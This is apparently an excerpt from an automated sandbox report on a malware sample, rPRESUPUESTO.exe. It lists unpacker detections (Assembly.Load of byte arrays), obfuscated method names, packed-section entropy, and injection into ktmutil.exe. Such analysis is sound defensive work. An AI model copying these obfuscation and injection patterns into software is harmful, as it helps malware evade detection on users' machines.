            Source: Binary string: wntdll.pdb source: rPRESUPUESTO.exe, rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.cs.Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.cs.Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.cs.Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: rPRESUPUESTO.exeStatic PE information: 0xEEB2EB9E [Sun Nov 25 17:32:14 2096 UTC]
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_0787AF9B push B807888Ch; iretd 0_2_0787AFA5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00414873 push ds; ret 5_2_00414882
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00405163 push F29618B7h; iretd 5_2_00405168
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00424103 push edi; retf 5_2_0042410C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0040512C push esi; iretd 5_2_0040512F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004169CC push ecx; retf 5_2_004169CD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004049E6 push ecx; retf 5_2_004049E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004049E8 push eax; retf 5_2_004049EB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00411B84 push es; ret 5_2_00411B8F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00411B97 pushfd ; ret 5_2_00411BAB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00403490 push eax; ret 5_2_00403492
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00404D07 push ds; ret 5_2_00404D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D09AD push ecx; mov dword ptr [esp], ecx5_2_017D09B6
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6D089 push eax; ret 8_2_04C6D08B
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6265F push edi; retf 8_2_04C62673
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6AE6D push cs; retf 8_2_04C6AE6E
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6266A push edi; retf 8_2_04C62673
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6221D push esp; iretd 8_2_04C6223A
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6278D push ecx; iretd 8_2_04C6278E
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C617BB push esp; iretd 8_2_04C617CA
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C62743 push ecx; iretd 8_2_04C62744
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B509AD push ecx; mov dword ptr [esp], ecx9_2_02B509B6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018E6F1 push es; ret 9_2_0018E6FC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018E704 pushfd ; ret 9_2_0018E718
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A0C70 push edi; retf 9_2_001A0C79
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001913E0 push ds; ret 9_2_001913EF
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00193539 push ecx; retf 9_2_0019353A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00181553 push ecx; retf 9_2_00181554
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00181555 push eax; retf 9_2_00181558
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00181874 push ds; ret 9_2_0018187D
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00181C99 push esi; iretd 9_2_00181C9C
            Source: rPRESUPUESTO.exeStatic PE information: section name: .text entropy: 7.915293858213766
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, dYxsZezjD2vd6yPHgC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UI3xEXPaLx', 'chPxoE7mpQ', 'n9XxtcsV6d', 'lctx2jJrAR', 'isbxl1oKcg', 'NwPxxJXMot', 'm6LxLK9j1p'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, jnNieI10C29r6YPK4W.csHigh entropy of concatenated method names: 'eHdTwuS5tA', 'boeTsV9I6h', 'Vmy40wruRa', 'ICi4Pe4v12', 'qrs4ZhUHZE', 'Mbk4n9y99p', 'lsj4Kwow1e', 'sbx4UbY56q', 'Qc94fwFVfi', 'Qih4Qv82R2'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, l1J7HFBZ1MgJlBwPK5.csHigh entropy of concatenated method names: 'do1xkYJ5ZO', 'YhaxGaoLyJ', 'RhXxXkFT5n', 'l7Kxu5gOvP', 'HGwxpekyZ9', 'lPVxTt5ep8', 'U5vxyTZ9cl', 'A4hlVHD1iO', 'hL9l7qNwUP', 'tPTlDHmnFm'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, rMS3WvcctN5gsoIYYg.csHigh entropy of concatenated method names: 'fD827ngggY', 'DD82B3cVQZ', 'Lp2lqNSVFd', 'THIlkGEP5h', 't2F2aIPypX', 'wgo2Rb6yG6', 'aRo2CnF7Zw', 'Bp82jLna0g', 'pGL29waH5P', 'fA72O7uumC'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, jcxJwOgYMsNuWo6rDt.csHigh entropy of concatenated method names: 'w874r60JFP', 'EhP4vNPr6I', 'Jfw4iu0Aha', 'sCK4gdGvN4', 'eYJ4orhu6n', 'EJL4td4MwM', 'zbB42iprRT', 'yS64lYXdSW', 'eXQ4xGl3EE', 'FEC4LiqFaE'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, kMIXWOixU8twbSWtxx.csHigh entropy of concatenated method names: 'FUEpj5hc98', 'Pdnp9h3jT5', 'HYQpON6Pb0', 'c3CpIwqvD9', 'qmYpAdPls6', 'GelpcZy3sK', 'Y0rpVgHqBY', 'Yqpp7qno6P', 'mnvpDnBbkp', 'gKHpBmkixK'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Ays466Ye2OgS5tPSlk.csHigh entropy of concatenated method names: 'UmI8jD4es13CVk9kWCJ', 'g8JfXI4OovIFxvqN7DX', 'MqKyly7TfD', 'CPXyxPIsdo', 'AGpyLOup2E', 'PlVSsj4fyiHdeOSQnrT', 'y6kUTv4EZ0bm7gBVQwN'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, NZwxqDXBm7FlmwqLQl.csHigh entropy of concatenated method names: 'SWNkHMIXWO', 'rU8kNtwbSW', 'TYMkbsNuWo', 'urDkWtHnNi', 'GPKko4WFFj', 'btfktZgqUl', 'If4Uknt3EXGbCdPc05', 'LpM7y6pvYCRCX7TIDS', 'z71KoHr8C5kZiNNQmm', 'qRrkk768NW'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, sTe3F6fHuEKyNny7Lb.csHigh entropy of concatenated method names: 'L8EHJAGhxX', 'VjrH5PQ6B8', 'RQwHmyJ5SQ', 'a27HrQcZy5', 'l3OHwbyL49', 'aHkHva3jEA', 'Cu1HsUjETg', 'yEGHihThoL', 'A1GHg9NQqI', 'SFiH1EG3OT'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Ljd7rDCBt3UIxc8BUY.csHigh entropy of concatenated method names: 'P5eEiKjnhp', 'F5pEgh7Qes', 'bARESosOXZ', 'kEbEYnsw5Y', 'jwPEPsSQ0t', 'mv4EZM9Km2', 'STiEKTRlL1', 'AkiEU4XKZG', 'pcoEQKtcOS', 'RCmEa4hv8y'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, CHhd18p30b5FjJ912H.csHigh entropy of concatenated method names: 'Dispose', 'j5GkDvOn2u', 'ImG8Y3ZePm', 'Bullllp2VL', 'acykBvj2dR', 'v9wkzc0YZE', 'ProcessDialogKey', 'Fcr8qSVmU4', 'VMZ8krBmlK', 'ldn88h1J7H'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Vyvj2d7RF9wc0YZE1c.csHigh entropy of concatenated method names: 'zpZludnjXV', 'UdUlpS8247', 'W6Vl4HV2Wg', 'lJBlTexnAb', 'nSdlyqoh1J', 'yeVlH1sQsw', 'yjRlNEO0lj', 'Q6clh5w74c', 'wwMlbuAV6r', 'IAqlWlyyL2'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.csHigh entropy of concatenated method names: 'bFqG3Bxpp6', 'yAGGuY70PU', 'nlNGpbAlrr', 'F3AG4IR8F1', 'RNTGTYo0nD', 'hxcGye63W4', 'wXIGHoZCg3', 'vReGNArNZa', 'FLYGh78DeE', 'EArGbxNRbA'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Atp1CPja1oRVV7weY4.csHigh entropy of concatenated method names: 'WZwoQhBlxl', 'oL7oRW3WCI', 'dBlojLiYHI', 'Cwho9gk8Qq', 'z5HoYmWkVu', 'yiJo0VWJCO', 'XVSoPE2ZDk', 'zUToZCfc53', 'UsDonLwqt3', 'OKHoKH6cnW'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Ek4TwYkqWlNK1TUGl6X.csHigh entropy of concatenated method names: 'esoxJTp71h', 'Gubx54Mx1e', 'G4XxmxmZyp', 'd3OxrK9mQu', 'SEaxwknDFj', 'k1Wxv6ICe5', 'c50xs7AND3', 'LuHxiLvJTY', 'pBDxgS0Zn4', 'Rrrx1XDUIG'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, YgVJrRKCxx1HS9qZcX.csHigh entropy of concatenated method names: 'D3GHu4qYg9', 'BZBH4Asg9u', 'glIHyechCm', 'miLyBNYn17', 'YVhyzfd1qT', 'iLNHqvHgoV', 'HnwHkGC7Na', 'sKIH87vdqT', 'JJDHGKTpkV', 'L1BHXpRKnF'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, JByv60Ip9yJbwQWgNM.csHigh entropy of concatenated method names: 'UCv2bh8dET', 'SMZ2WkXBHc', 'ToString', 'r3F2u1E950', 'xGB2pLwjce', 'e9T240BC4S', 'MOI2TrZXAE', 'Orm2ySqx1B', 'jBN2HH4x3M', 'tR62NNPoqu'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, vFj8tfSZgqUlYsQxMp.csHigh entropy of concatenated method names: 'y9Jy35RRa0', 'sy6ypiTSuA', 'ClhyTRlbPt', 'YvNyHymtc8', 'YYjyNe3OmX', 'BVYTABXb1X', 'L6bTcTtYhA', 'FIsTVBjUJb', 'jhrT7MD3SY', 'XUrTDEKKIR'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, ASVmU4DcMZrBmlKhdn.csHigh entropy of concatenated method names: 'qlHlSmAUJw', 'kQplY6rd28', 'Wp6l0fAp2x', 'vl0lPeWgKf', 'c9ZljWUKW5', 'N7NlZm7yiV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, g9VT4R8NH23savAS8y.csHigh entropy of concatenated method names: 'CFOmpREXH', 'bG4rB6jxd', 'aHovDNemB', 'gj4svE4Tl', 's9QgTtGy4', 'oWw1gifUZ', 'ioxvO00wCF9lcA6DVg', 'ajlr4mBnZ769RSx0QF', 'D49jwEYpeYrfarkWnR', 'kNLlV1xQb'
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, AjQT9mkG0ultOemfqx7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JJTLjH8whY', 'aCnL9xAyiN', 'u0xLOSw2b8', 'KmBLIh5pcY', 'ls5LApRAqR', 'fn8LchAfKy', 'd4eLVmvLa8'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, dYxsZezjD2vd6yPHgC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UI3xEXPaLx', 'chPxoE7mpQ', 'n9XxtcsV6d', 'lctx2jJrAR', 'isbxl1oKcg', 'NwPxxJXMot', 'm6LxLK9j1p'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, jnNieI10C29r6YPK4W.csHigh entropy of concatenated method names: 'eHdTwuS5tA', 'boeTsV9I6h', 'Vmy40wruRa', 'ICi4Pe4v12', 'qrs4ZhUHZE', 'Mbk4n9y99p', 'lsj4Kwow1e', 'sbx4UbY56q', 'Qc94fwFVfi', 'Qih4Qv82R2'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, l1J7HFBZ1MgJlBwPK5.csHigh entropy of concatenated method names: 'do1xkYJ5ZO', 'YhaxGaoLyJ', 'RhXxXkFT5n', 'l7Kxu5gOvP', 'HGwxpekyZ9', 'lPVxTt5ep8', 'U5vxyTZ9cl', 'A4hlVHD1iO', 'hL9l7qNwUP', 'tPTlDHmnFm'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, rMS3WvcctN5gsoIYYg.csHigh entropy of concatenated method names: 'fD827ngggY', 'DD82B3cVQZ', 'Lp2lqNSVFd', 'THIlkGEP5h', 't2F2aIPypX', 'wgo2Rb6yG6', 'aRo2CnF7Zw', 'Bp82jLna0g', 'pGL29waH5P', 'fA72O7uumC'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, jcxJwOgYMsNuWo6rDt.csHigh entropy of concatenated method names: 'w874r60JFP', 'EhP4vNPr6I', 'Jfw4iu0Aha', 'sCK4gdGvN4', 'eYJ4orhu6n', 'EJL4td4MwM', 'zbB42iprRT', 'yS64lYXdSW', 'eXQ4xGl3EE', 'FEC4LiqFaE'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, kMIXWOixU8twbSWtxx.csHigh entropy of concatenated method names: 'FUEpj5hc98', 'Pdnp9h3jT5', 'HYQpON6Pb0', 'c3CpIwqvD9', 'qmYpAdPls6', 'GelpcZy3sK', 'Y0rpVgHqBY', 'Yqpp7qno6P', 'mnvpDnBbkp', 'gKHpBmkixK'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ays466Ye2OgS5tPSlk.csHigh entropy of concatenated method names: 'UmI8jD4es13CVk9kWCJ', 'g8JfXI4OovIFxvqN7DX', 'MqKyly7TfD', 'CPXyxPIsdo', 'AGpyLOup2E', 'PlVSsj4fyiHdeOSQnrT', 'y6kUTv4EZ0bm7gBVQwN'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, NZwxqDXBm7FlmwqLQl.csHigh entropy of concatenated method names: 'SWNkHMIXWO', 'rU8kNtwbSW', 'TYMkbsNuWo', 'urDkWtHnNi', 'GPKko4WFFj', 'btfktZgqUl', 'If4Uknt3EXGbCdPc05', 'LpM7y6pvYCRCX7TIDS', 'z71KoHr8C5kZiNNQmm', 'qRrkk768NW'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, sTe3F6fHuEKyNny7Lb.csHigh entropy of concatenated method names: 'L8EHJAGhxX', 'VjrH5PQ6B8', 'RQwHmyJ5SQ', 'a27HrQcZy5', 'l3OHwbyL49', 'aHkHva3jEA', 'Cu1HsUjETg', 'yEGHihThoL', 'A1GHg9NQqI', 'SFiH1EG3OT'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ljd7rDCBt3UIxc8BUY.csHigh entropy of concatenated method names: 'P5eEiKjnhp', 'F5pEgh7Qes', 'bARESosOXZ', 'kEbEYnsw5Y', 'jwPEPsSQ0t', 'mv4EZM9Km2', 'STiEKTRlL1', 'AkiEU4XKZG', 'pcoEQKtcOS', 'RCmEa4hv8y'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, CHhd18p30b5FjJ912H.csHigh entropy of concatenated method names: 'Dispose', 'j5GkDvOn2u', 'ImG8Y3ZePm', 'Bullllp2VL', 'acykBvj2dR', 'v9wkzc0YZE', 'ProcessDialogKey', 'Fcr8qSVmU4', 'VMZ8krBmlK', 'ldn88h1J7H'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Vyvj2d7RF9wc0YZE1c.csHigh entropy of concatenated method names: 'zpZludnjXV', 'UdUlpS8247', 'W6Vl4HV2Wg', 'lJBlTexnAb', 'nSdlyqoh1J', 'yeVlH1sQsw', 'yjRlNEO0lj', 'Q6clh5w74c', 'wwMlbuAV6r', 'IAqlWlyyL2'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.csHigh entropy of concatenated method names: 'bFqG3Bxpp6', 'yAGGuY70PU', 'nlNGpbAlrr', 'F3AG4IR8F1', 'RNTGTYo0nD', 'hxcGye63W4', 'wXIGHoZCg3', 'vReGNArNZa', 'FLYGh78DeE', 'EArGbxNRbA'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Atp1CPja1oRVV7weY4.csHigh entropy of concatenated method names: 'WZwoQhBlxl', 'oL7oRW3WCI', 'dBlojLiYHI', 'Cwho9gk8Qq', 'z5HoYmWkVu', 'yiJo0VWJCO', 'XVSoPE2ZDk', 'zUToZCfc53', 'UsDonLwqt3', 'OKHoKH6cnW'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ek4TwYkqWlNK1TUGl6X.csHigh entropy of concatenated method names: 'esoxJTp71h', 'Gubx54Mx1e', 'G4XxmxmZyp', 'd3OxrK9mQu', 'SEaxwknDFj', 'k1Wxv6ICe5', 'c50xs7AND3', 'LuHxiLvJTY', 'pBDxgS0Zn4', 'Rrrx1XDUIG'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, YgVJrRKCxx1HS9qZcX.csHigh entropy of concatenated method names: 'D3GHu4qYg9', 'BZBH4Asg9u', 'glIHyechCm', 'miLyBNYn17', 'YVhyzfd1qT', 'iLNHqvHgoV', 'HnwHkGC7Na', 'sKIH87vdqT', 'JJDHGKTpkV', 'L1BHXpRKnF'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, JByv60Ip9yJbwQWgNM.csHigh entropy of concatenated method names: 'UCv2bh8dET', 'SMZ2WkXBHc', 'ToString', 'r3F2u1E950', 'xGB2pLwjce', 'e9T240BC4S', 'MOI2TrZXAE', 'Orm2ySqx1B', 'jBN2HH4x3M', 'tR62NNPoqu'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, vFj8tfSZgqUlYsQxMp.csHigh entropy of concatenated method names: 'y9Jy35RRa0', 'sy6ypiTSuA', 'ClhyTRlbPt', 'YvNyHymtc8', 'YYjyNe3OmX', 'BVYTABXb1X', 'L6bTcTtYhA', 'FIsTVBjUJb', 'jhrT7MD3SY', 'XUrTDEKKIR'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, ASVmU4DcMZrBmlKhdn.csHigh entropy of concatenated method names: 'qlHlSmAUJw', 'kQplY6rd28', 'Wp6l0fAp2x', 'vl0lPeWgKf', 'c9ZljWUKW5', 'N7NlZm7yiV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, g9VT4R8NH23savAS8y.csHigh entropy of concatenated method names: 'CFOmpREXH', 'bG4rB6jxd', 'aHovDNemB', 'gj4svE4Tl', 's9QgTtGy4', 'oWw1gifUZ', 'ioxvO00wCF9lcA6DVg', 'ajlr4mBnZ769RSx0QF', 'D49jwEYpeYrfarkWnR', 'kNLlV1xQb'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, AjQT9mkG0ultOemfqx7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JJTLjH8whY', 'aCnL9xAyiN', 'u0xLOSw2b8', 'KmBLIh5pcY', 'ls5LApRAqR', 'fn8LchAfKy', 'd4eLVmvLa8'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, dYxsZezjD2vd6yPHgC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UI3xEXPaLx', 'chPxoE7mpQ', 'n9XxtcsV6d', 'lctx2jJrAR', 'isbxl1oKcg', 'NwPxxJXMot', 'm6LxLK9j1p'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, jnNieI10C29r6YPK4W.csHigh entropy of concatenated method names: 'eHdTwuS5tA', 'boeTsV9I6h', 'Vmy40wruRa', 'ICi4Pe4v12', 'qrs4ZhUHZE', 'Mbk4n9y99p', 'lsj4Kwow1e', 'sbx4UbY56q', 'Qc94fwFVfi', 'Qih4Qv82R2'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, l1J7HFBZ1MgJlBwPK5.csHigh entropy of concatenated method names: 'do1xkYJ5ZO', 'YhaxGaoLyJ', 'RhXxXkFT5n', 'l7Kxu5gOvP', 'HGwxpekyZ9', 'lPVxTt5ep8', 'U5vxyTZ9cl', 'A4hlVHD1iO', 'hL9l7qNwUP', 'tPTlDHmnFm'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, rMS3WvcctN5gsoIYYg.csHigh entropy of concatenated method names: 'fD827ngggY', 'DD82B3cVQZ', 'Lp2lqNSVFd', 'THIlkGEP5h', 't2F2aIPypX', 'wgo2Rb6yG6', 'aRo2CnF7Zw', 'Bp82jLna0g', 'pGL29waH5P', 'fA72O7uumC'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, jcxJwOgYMsNuWo6rDt.csHigh entropy of concatenated method names: 'w874r60JFP', 'EhP4vNPr6I', 'Jfw4iu0Aha', 'sCK4gdGvN4', 'eYJ4orhu6n', 'EJL4td4MwM', 'zbB42iprRT', 'yS64lYXdSW', 'eXQ4xGl3EE', 'FEC4LiqFaE'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, kMIXWOixU8twbSWtxx.csHigh entropy of concatenated method names: 'FUEpj5hc98', 'Pdnp9h3jT5', 'HYQpON6Pb0', 'c3CpIwqvD9', 'qmYpAdPls6', 'GelpcZy3sK', 'Y0rpVgHqBY', 'Yqpp7qno6P', 'mnvpDnBbkp', 'gKHpBmkixK'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ays466Ye2OgS5tPSlk.csHigh entropy of concatenated method names: 'UmI8jD4es13CVk9kWCJ', 'g8JfXI4OovIFxvqN7DX', 'MqKyly7TfD', 'CPXyxPIsdo', 'AGpyLOup2E', 'PlVSsj4fyiHdeOSQnrT', 'y6kUTv4EZ0bm7gBVQwN'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, NZwxqDXBm7FlmwqLQl.csHigh entropy of concatenated method names: 'SWNkHMIXWO', 'rU8kNtwbSW', 'TYMkbsNuWo', 'urDkWtHnNi', 'GPKko4WFFj', 'btfktZgqUl', 'If4Uknt3EXGbCdPc05', 'LpM7y6pvYCRCX7TIDS', 'z71KoHr8C5kZiNNQmm', 'qRrkk768NW'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, sTe3F6fHuEKyNny7Lb.csHigh entropy of concatenated method names: 'L8EHJAGhxX', 'VjrH5PQ6B8', 'RQwHmyJ5SQ', 'a27HrQcZy5', 'l3OHwbyL49', 'aHkHva3jEA', 'Cu1HsUjETg', 'yEGHihThoL', 'A1GHg9NQqI', 'SFiH1EG3OT'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ljd7rDCBt3UIxc8BUY.csHigh entropy of concatenated method names: 'P5eEiKjnhp', 'F5pEgh7Qes', 'bARESosOXZ', 'kEbEYnsw5Y', 'jwPEPsSQ0t', 'mv4EZM9Km2', 'STiEKTRlL1', 'AkiEU4XKZG', 'pcoEQKtcOS', 'RCmEa4hv8y'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, CHhd18p30b5FjJ912H.csHigh entropy of concatenated method names: 'Dispose', 'j5GkDvOn2u', 'ImG8Y3ZePm', 'Bullllp2VL', 'acykBvj2dR', 'v9wkzc0YZE', 'ProcessDialogKey', 'Fcr8qSVmU4', 'VMZ8krBmlK', 'ldn88h1J7H'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Vyvj2d7RF9wc0YZE1c.csHigh entropy of concatenated method names: 'zpZludnjXV', 'UdUlpS8247', 'W6Vl4HV2Wg', 'lJBlTexnAb', 'nSdlyqoh1J', 'yeVlH1sQsw', 'yjRlNEO0lj', 'Q6clh5w74c', 'wwMlbuAV6r', 'IAqlWlyyL2'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.csHigh entropy of concatenated method names: 'bFqG3Bxpp6', 'yAGGuY70PU', 'nlNGpbAlrr', 'F3AG4IR8F1', 'RNTGTYo0nD', 'hxcGye63W4', 'wXIGHoZCg3', 'vReGNArNZa', 'FLYGh78DeE', 'EArGbxNRbA'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Atp1CPja1oRVV7weY4.csHigh entropy of concatenated method names: 'WZwoQhBlxl', 'oL7oRW3WCI', 'dBlojLiYHI', 'Cwho9gk8Qq', 'z5HoYmWkVu', 'yiJo0VWJCO', 'XVSoPE2ZDk', 'zUToZCfc53', 'UsDonLwqt3', 'OKHoKH6cnW'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ek4TwYkqWlNK1TUGl6X.csHigh entropy of concatenated method names: 'esoxJTp71h', 'Gubx54Mx1e', 'G4XxmxmZyp', 'd3OxrK9mQu', 'SEaxwknDFj', 'k1Wxv6ICe5', 'c50xs7AND3', 'LuHxiLvJTY', 'pBDxgS0Zn4', 'Rrrx1XDUIG'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, YgVJrRKCxx1HS9qZcX.csHigh entropy of concatenated method names: 'D3GHu4qYg9', 'BZBH4Asg9u', 'glIHyechCm', 'miLyBNYn17', 'YVhyzfd1qT', 'iLNHqvHgoV', 'HnwHkGC7Na', 'sKIH87vdqT', 'JJDHGKTpkV', 'L1BHXpRKnF'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, JByv60Ip9yJbwQWgNM.csHigh entropy of concatenated method names: 'UCv2bh8dET', 'SMZ2WkXBHc', 'ToString', 'r3F2u1E950', 'xGB2pLwjce', 'e9T240BC4S', 'MOI2TrZXAE', 'Orm2ySqx1B', 'jBN2HH4x3M', 'tR62NNPoqu'
